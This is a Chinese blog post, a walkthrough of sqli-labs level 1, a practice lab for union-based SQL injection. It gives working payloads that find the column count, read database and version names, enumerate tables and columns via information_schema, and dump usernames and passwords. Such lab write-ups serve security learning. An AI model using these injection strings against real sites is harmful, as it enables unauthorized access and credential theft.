<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"harbeter.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":true,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="基本流程 判断注入类型 判断字段数 判断回显点 爆库名 爆表名 爆字段名 查数据">
<meta property="og:type" content="article">
<meta property="og:title" content="sqlilabs第一关">
<meta property="og:url" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/index.html">
<meta property="og:site_name" content="像风吹过八千里">
<meta property="og:description" content="基本流程 判断注入类型 判断字段数 判断回显点 爆库名 爆表名 爆字段名 查数据">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119233021588.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119233152339.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119233346623.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119233931711.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119234541896.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119235023249.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119235118690.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119235809113.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120001307291.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120001832155.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120001634734.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120002239875.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120003415735.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120003558071.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120004823668.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120004905808.png">
<meta property="og:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120005243708.png">
<meta property="article:published_time" content="2022-01-19T13:12:13.037Z">
<meta property="article:modified_time" content="2022-01-19T16:54:40.806Z">
<meta property="article:author" content="Harbeter">
<meta property="article:tag" content="SQL">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119233021588.png">

<link rel="canonical" href="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sqlilabs第一关 | 像风吹过八千里</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">像风吹过八千里</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">流云和月都曾爱过你</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://harbeter.github.io/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="Harbeter">
      <meta itemprop="description" content="愿你永远善良，永远向往未来！">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="像风吹过八千里">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sqlilabs第一关
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-01-19 21:12:13" itemprop="dateCreated datePublished" datetime="2022-01-19T21:12:13+08:00">2022-01-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-01-20 00:54:40" itemprop="dateModified" datetime="2022-01-20T00:54:40+08:00">2022-01-20</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="基本流程"><a href="#基本流程" class="headerlink" title="基本流程"></a>基本流程</h1><ol>
<li>判断注入类型</li>
<li>判断字段数</li>
<li>判断回显点</li>
<li>爆库名</li>
<li>爆表名</li>
<li>爆字段名</li>
<li>查数据</li>
</ol>
<span id="more"></span>

<p>为了方便找错，在源码处可以让其输出所执行的sql命令，方法如下</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119233021588.png" alt="image-20220119233021588"></p>
<h1 id="判断注入类型"><a href="#判断注入类型" class="headerlink" title="判断注入类型"></a>判断注入类型</h1><p>首先输入id=1，回显正常</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119233152339.png" alt="image-20220119233152339"></p>
<p>这里的<code>LIMIT 0,1</code>的意思是输出0行后1行的内容。</p>
<p>然后尝试加单引号   <code>&#39;</code>  回显错误</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119233346623.png" alt="image-20220119233346623"></p>
<p>尝试加<code>--+</code>或者<code>%23</code>，这里二者效果一样，都是注释的方法，<code>--+</code>表示<code>--空格 </code> 在URL中空格可以由+表示，然后<code>%23</code>是 # 的URL编码，也是注释。加完之后回显正常</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119233931711.png" alt="image-20220119233931711"></p>
<p>由此可知，该注入类型为字符型，闭合方式为单引号。</p>
<h1 id="判断字段数"><a href="#判断字段数" class="headerlink" title="判断字段数"></a>判断字段数</h1><p>union有一个非常严格的约束条件，因为是联合查询，必须保证字段数一致，即两个查询结果有相同的列数，因此，若要判断字段数，即可根据<code>order by n;</code>的回显即可，构造如下sql命令</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119234541896.png" alt="image-20220119234541896"></p>
<p>发现1-3都能正常回显，而4不行，即可得知字段数为3。</p>
<p>这里的<code>order by n;</code>是根据第几列顺序排列查询结果，如图加与不加order by 3的区别</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119235023249.png" alt="image-20220119235023249"></p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119235118690.png" alt="image-20220119235118690"></p>
<p><strong>注意：此处使用order by仅仅改变查询结果的顺序，对原本数据库排列顺序没有影响</strong></p>
<h1 id="判断回显点"><a href="#判断回显点" class="headerlink" title="判断回显点"></a>判断回显点</h1><p>回显点说白了就是回显的点位</p>
<p>联合查询输出是严格按照顺序进行的，因此，当id=1<strong>存在时</strong>会在第0行输出第1个sql语句的查询结果，也就是如下图所示</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220119235809113.png" alt="image-20220119235809113"></p>
<p>它确实执行了我们第二条sql语句，也就是union后面的select语句，只是没有显示，因此我们可以通过以下两种方法，输出第二条sql语句的查询结果</p>
<p>LIMIT后的第一个参数是输出记录的初始位置，第二个参数偏移量，偏移多少，输出的条目就是多少。比如说，<code>limit 1,3</code> 就是输出2，3，4行的内容。此时的表为</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120001307291.png" alt="image-20220120001307291"></p>
<p>构造以下语句，输出第二行（由于题目限制，不能两行同时输出，即<code>limit 0,2</code>无用）</p>
<p><code>id=1&#39; union select 1,2,3 limit 1,1 --+</code></p>
<p>输入不存在的-1</p>
<p><code>id=-1&#39; union select 1,2,3 --+</code></p>
<p><strong>注意：此处的1，2，3内容随便换</strong></p>
<p>实质就是select语句</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120001832155.png" alt="image-20220120001832155"></p>
<p>得到如下回显，即可知道，2，3处为回显点</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120001634734.png" alt="image-20220120001634734"></p>
<h1 id="暴库名"><a href="#暴库名" class="headerlink" title="暴库名"></a>暴库名</h1><p>回显点已经知道，则可直接执行<code>database()</code>  和  <code>version()</code>  来查看数据库名和MySQL数据库版本</p>
<p><code>id=-1&#39; union select 1,database(),version() -++</code></p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120002239875.png" alt="image-20220120002239875"></p>
<h1 id="爆表名"><a href="#爆表名" class="headerlink" title="爆表名"></a>爆表名</h1><p>构造以下语句</p>
<p><code>id=-1&#39; union select 1,group_concat(table_name),version() from information_schema.tables where table_schema=&#39;security&#39; --+</code></p>
<p>这句话的意思是，从information_schema库中tables表中table_name列中找与table_scheam列为security的元素，information_schema是mysql<strong>自带的库</strong>，记录了该数据库<strong>所有的表名和字段名</strong></p>
<p>也就是找这些东西</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120003415735.png" alt="image-20220120003415735"></p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120003558071.png" alt="image-20220120003558071"></p>
<p>这里的表可以先看users，如果不对再看其他的。</p>
<h1 id="爆字段名"><a href="#爆字段名" class="headerlink" title="爆字段名"></a>爆字段名</h1><p>构造如下语句</p>
<p><code>id=-1&#39; union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=&#39;security&#39; and table_name=&#39;users&#39; --+</code></p>
<p>这句话的意思是，从information_schema库中colums表中column_name列找table_schema列为security和table_name列为user的元素</p>
<p>即如下这些</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120004823668.png" alt="image-20220120004823668"></p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120004905808.png" alt="image-20220120004905808"></p>
<h1 id="查数据"><a href="#查数据" class="headerlink" title="查数据"></a>查数据</h1><p>构造如下语句</p>
<p><code>id=-1&#39; union select 1,group_concat(username,0x5c,password),3 from security.users --+</code></p>
<p>这句话的意思是在security库的users表中找出所有username与对应的password，这里面的0x5c是\的十六进制编码。也可以是别的</p>
<p><img src="/2022/01/19/sqlilabs%E7%AC%AC%E4%B8%80%E5%85%B3/image-20220120005243708.png" alt="image-20220120005243708"></p>
<p>完成。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/SQL/" rel="tag"># SQL</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/01/17/C-%E7%9A%84%E5%87%BD%E6%95%B0/" rel="prev" title="C++的函数">
      <i class="fa fa-chevron-left"></i> C++的函数
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/01/20/sqlilabs%E7%AC%AC%E4%BA%8C%E5%85%B3/" rel="next" title="sqlilabs第二关（sqlmap初体验）">
      sqlilabs第二关（sqlmap初体验） <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E6%B5%81%E7%A8%8B"><span class="nav-number">1.</span> <span class="nav-text">基本流程</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B"><span class="nav-number">2.</span> <span class="nav-text">判断注入类型</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%88%A4%E6%96%AD%E5%AD%97%E6%AE%B5%E6%95%B0"><span class="nav-number">3.</span> <span class="nav-text">判断字段数</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%88%A4%E6%96%AD%E5%9B%9E%E6%98%BE%E7%82%B9"><span class="nav-number">4.</span> <span class="nav-text">判断回显点</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9A%B4%E5%BA%93%E5%90%8D"><span class="nav-number">5.</span> <span class="nav-text">暴库名</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%88%86%E8%A1%A8%E5%90%8D"><span class="nav-number">6.</span> <span class="nav-text">爆表名</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%88%86%E5%AD%97%E6%AE%B5%E5%90%8D"><span class="nav-number">7.</span> <span class="nav-text">爆字段名</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9F%A5%E6%95%B0%E6%8D%AE"><span class="nav-number">8.</span> <span class="nav-text">查数据</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Harbeter"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">Harbeter</p>
  <div class="site-description" itemprop="description">愿你永远善良，永远向往未来！</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:qq2300350627@163.com" title="E-Mail → mailto:qq2300350627@163.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">冀ICP备2021027275号 </a>
  </div>

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harbeter</span>
</div>


        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/medium-zoom@1/dist/medium-zoom.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>
    <script defer src="/lib/three/canvas_lines.min.js"></script>


  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>


